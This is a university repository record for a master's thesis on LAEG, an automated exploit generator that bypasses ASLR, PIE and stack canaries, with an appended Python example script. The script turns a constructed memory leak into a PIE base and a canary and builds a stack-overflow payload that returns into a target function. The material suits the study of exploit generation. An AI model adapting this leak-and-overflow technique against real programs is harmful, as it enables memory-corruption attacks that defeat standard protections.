Please use this Handle URI to cite this item:
http://tdr.lib.ntu.edu.tw/jspui/handle/123456789/81167
Full metadata record
| DC field | Value | Language |
|---|---|---|
| dc.contributor.advisor | 蕭旭君(Hsu-Chun Hsiao) | |
| dc.contributor.author | Wei Loon Mow | en |
| dc.contributor.author | 毛偉倫 | zh_TW |
| dc.date.accessioned | 2022-11-24T03:33:59Z | - |
| dc.date.available | 2021-09-02 | |
| dc.date.available | 2022-11-24T03:33:59Z | - |
| dc.date.copyright | 2021-09-02 | |
| dc.date.issued | 2021 | |
| dc.date.submitted | 2021-08-12 | |
| dc.identifier.uri | http://tdr.lib.ntu.edu.tw/jspui/handle/123456789/81167 | - |
| dc.description.abstract | ASLR is a software protection mechanism intended to stop attacks from succeeding, and it is enabled by default on today's systems. Each time a program runs, ASLR places the start of every memory region at a random address, so an attacker cannot simply guess the region addresses an attack depends on. With ASLR enabled, an attacker first needs an additional information leak to obtain the base addresses of the relevant regions before the attack can succeed. We observe, however, that prior automated exploit generation (AEG) techniques assume that ASLR is disabled. We therefore propose LAEG, a new AEG technique. LAEG applies dynamic taint analysis to a given crashing input to collect what we define as input and output states, uses this information to detect possible information leaks, recovers the base addresses of the program's regions from the leaked data, and then generates an exploit script that bypasses ASLR. Our experiments confirm that LAEG bypasses ASLR, PIE and stack canaries, generates exploit scripts faster than Zeratool, the current open-source AEG tool, and produces a working exploit 6.46 to 45.15 times faster than a human. | zh_TW |
| dc.description.provenance | Made available in DSpace on 2022-11-24T03:33:59Z (GMT). No. of bitstreams: 1 U0001-0508202117214500.pdf: 893237 bytes, checksum: 7aa8ad61ab7ff14e5ad7f3044a58ac9f (MD5) Previous issue date: 2021 | en |
| dc.description.tableofcontents | Oral defense committee approval form (p. iii); Acknowledgements in Chinese (p. v); Acknowledgements (p. vii); Abstract in Chinese (p. ix); Abstract (p. xi); 1 Introduction (p. 1); 2 Background (p. 3); 2.1 Challenges in Automated Exploit Generation (p. 4); 2.1.1 Preprocessing (p. 4); 2.1.2 Bug Finding (p. 5); 2.1.3 Exploit Generation (p. 5); 2.2 Address Space Layout Randomization (p. 5); 2.3 Dynamic Taint Analysis (p. 6); 3 Motivating Example (p. 9); 3.1 Canary (p. 10); 3.2 PIE and ASLR (p. 11); 4 System Overview (p. 13); 4.1 Bug Finding (p. 14); 4.2 Binary Analysis (p. 14); 4.3 Exploit Generation (p. 15); 5 Bug Finding (p. 17); 5.1 Automated Vulnerability Discovery (p. 17); 5.2 Custom Input (p. 17); 6 Binary Analysis (p. 19); 6.1 Dynamic Taint Analysis (p. 19); 6.2 Uninitialized Buffer Detection (p. 21); 6.3 Leak Detection (p. 23); 6.4 Seed Generation (p. 25); 6.5 Exploitable State Detection (p. 25); 7 Exploit Generation (p. 27); 7.1 Exploitable State (p. 27); 7.2 Input and Output States (p. 28); 7.3 Exploit Recipe (p. 29); 7.4 Generate Exploit Script (p. 30); 8 Evaluation (p. 31); 8.1 System Environment and Custom Input (p. 31); 8.2 Target Binary (p. 31); 8.3 RQ1: Effectiveness of LAEG (p. 32); 8.4 RQ2: Speed of LAEG vs Zeratool (p. 33); 8.5 RQ3: LAEG vs Binary Protection (p. 34); 8.6 Limitation and Discussion (p. 35); 8.6.1 False Positive and False Negative for LAEG Information Leak (p. 35); 8.6.2 Real World Binary (p. 36); 9 Related Work (p. 37); 9.1 Symbolic Execution Based AEG (p. 37); 9.2 Bypassing ASLR (p. 38); 9.3 AEG Exploiting Heap Vulnerabilities (p. 38); 9.4 Searching for Heap Exploitation Primitives (p. 39); 10 Future Work (p. 41); 11 Conclusion (p. 43); Bibliography (p. 45) | |
| dc.language.iso | en | |
| dc.subject | ASLR | zh_TW |
| dc.subject | Automated Exploit Generation | zh_TW |
| dc.subject | Dynamic Taint Analysis | zh_TW |
| dc.subject | ASLR | en |
| dc.subject | Dynamic Taint Analysis | en |
| dc.subject | Automated Exploit Generation | en |
| dc.title | Automated Exploit Generation Bypassing ASLR via Dynamic Program Analysis | zh_TW |
| dc.title | Bypassing ASLR with Dynamic Binary Analysis for Automated Exploit Generation | en |
| dc.date.schoolyear | 109-2 | |
| dc.description.degree | Master's | |
| dc.contributor.oralexamcommittee | 黃世昆(Hsin-Tsai Liu),黃俊穎(Chih-Yang Tseng) | |
| dc.subject.keyword | Automated Exploit Generation, Dynamic Taint Analysis, ASLR | zh_TW |
| dc.subject.keyword | Automated Exploit Generation, Dynamic Taint Analysis, ASLR | en |
| dc.relation.page | 47 | |
| dc.identifier.doi | 10.6342/NTU202102120 | |
| dc.rights.note | Authorized for release (campus-only access) | |
| dc.date.accepted | 2021-08-12 | |
| dc.contributor.author-college | College of Electrical Engineering and Computer Science | zh_TW |
| dc.contributor.author-dept | Graduate Institute of Computer Science and Information Engineering | zh_TW |
| Appears in collections: | Department of Computer Science and Information Engineering | |
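The abstract describes LAEG's pipeline: detect an information leak in the program's output, recover the base addresses of the randomized regions from the leaked values, and emit an exploit script that uses them. The script below is an added example, not code from the thesis or from the LAEG implementation, that reproduces the recovery and exploit-assembly steps on a constructed leak. Everything in it is assumed: the leak bytes, the image offsets (a return address into `main` at 0x11e5, a lone `ret` gadget at 0x101a, a target function `win` at 0x1189), the 64-byte overflowed buffer and the stack-frame layout. Recognising leaked values by their page offset and by the canary's shape is a heuristic used here in place of the thesis's taint-based leak detection; the ambiguity check models the false-positive case the thesis discusses in section 8.6.1.

```python
# Added example (not from the thesis or LAEG): leak -> base recovery -> exploit.
# Constructed scenario: x86-64 Linux, PIE binary with ASLR and stack canary on.
# The program first writes an uninitialized 40-byte stack buffer to stdout
# (the information leak), then reads unbounded input into a 64-byte stack
# buffer (the overflow). Every address and offset below is made up.
import struct

PAGE_MASK = 0xFFF          # the PIE image base is 4 KiB-aligned under Linux ASLR
USER_SPACE_TOP = 1 << 47   # canonical user-space addresses lie below this

# Assumed image offsets, as they would be read from the unrandomized binary.
KNOWN_CODE_OFFSETS = {"main+0x4c": 0x11E5}   # a return address that can sit in the leaked buffer
RET_GADGET_OFFSET = 0x101A                   # a lone `ret`, used to fix stack alignment
WIN_OFFSET = 0x1189                          # the function the exploit wants to reach
BUF_SIZE = 64                                # size of the overflowed buffer


def p64(v: int) -> bytes:
    return struct.pack("<Q", v)


def classify_leak(leak: bytes, known_code_offsets: dict) -> dict:
    """Scan the leak 8 bytes at a time for the two values an ASLR bypass needs.

    Heuristic used here (not the thesis's taint-based detection):
      * code pointer: the randomized base is page-aligned, so the low 12 bits
        of a leaked pointer equal the low 12 bits of its image offset;
      * canary: glibc's x86-64 canary has a zero low byte and random high
        bits, and no user-space pointer has its top 16 bits set.
    """
    canaries, bases = [], []
    for i in range(0, len(leak) - 7, 8):
        q = struct.unpack_from("<Q", leak, i)[0]
        if q == 0:
            continue
        if (q & 0xFF) == 0 and (q >> 48) != 0:
            canaries.append(q)
        elif q < USER_SPACE_TOP:
            for name, off in known_code_offsets.items():
                if (q & PAGE_MASK) == (off & PAGE_MASK) and q > off:
                    bases.append((name, q - off))
    return {"canaries": canaries, "bases": bases}


def recover_layout(leak: bytes, known_code_offsets: dict):
    """Return {'pie_base', 'canary'} or None when the leak is ambiguous.

    A stack or heap pointer matches a known page offset with probability
    1/4096 per symbol, so disagreeing base candidates (or several canary
    candidates) are treated as a false positive and no exploit is generated.
    """
    found = classify_leak(leak, known_code_offsets)
    bases = {base for _, base in found["bases"]}
    if len(bases) != 1 or len(found["canaries"]) != 1:
        return None
    return {"pie_base": bases.pop(), "canary": found["canaries"][0]}


def build_payload(layout: dict, buf_size: int, ret_gadget_off: int, win_off: int) -> bytes:
    """Assemble the overflow for the assumed frame [buf][canary][saved rbp][return]."""
    base = layout["pie_base"]
    return (b"A" * buf_size
            + p64(layout["canary"])               # keep the canary check passing
            + p64(0x4242424242424242)             # saved rbp: not dereferenced before win runs
            + p64(base + ret_gadget_off)          # extra `ret` realigns rsp to 16 bytes for win's calls
            + p64(base + win_off))                # finally return into win


def constructed_leak(pie_base: int, canary: int) -> bytes:
    """Stale stack contents a vulnerable program might dump (constructed)."""
    return (p64(0x4141414141414141)       # leftover input
            + p64(canary)                 # an old canary slot
            + p64(0x7FFD8A2B4C10)         # an old saved rbp (stack pointer, unusable here)
            + p64(pie_base + 0x11E5)      # an old return address into main
            + p64(0))


def exploit_from_leak(leak: bytes):
    """End-to-end step: None if no usable leak, else the overflow bytes to send."""
    layout = recover_layout(leak, KNOWN_CODE_OFFSETS)
    if layout is None:
        return None
    return build_payload(layout, BUF_SIZE, RET_GADGET_OFFSET, WIN_OFFSET)


if __name__ == "__main__":
    leak = constructed_leak(0x55D4A1C3E000, 0x7C3F91A0E2D5B300)
    layout = recover_layout(leak, KNOWN_CODE_OFFSETS)
    print("recovered:", {k: hex(v) for k, v in layout.items()})
    print("payload:", exploit_from_leak(leak).hex())
```

In a real run the leak bytes come from the target's stdout and the payload goes back on its stdin; the page-offset match only identifies which region a pointer belongs to, and the thesis's input/output-state tracking is what ties a leaked value to the specific stack slot it came from.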
Files in this item:
| File | Size | Format |
|---|---|---|
| U0001-0508202117214500.pdf (access restricted to NTU campus IP addresses; use the VPN service from off campus) | 872.3 kB | Adobe PDF |
Items in the repository are protected by copyright, with all rights reserved, unless otherwise indicated.
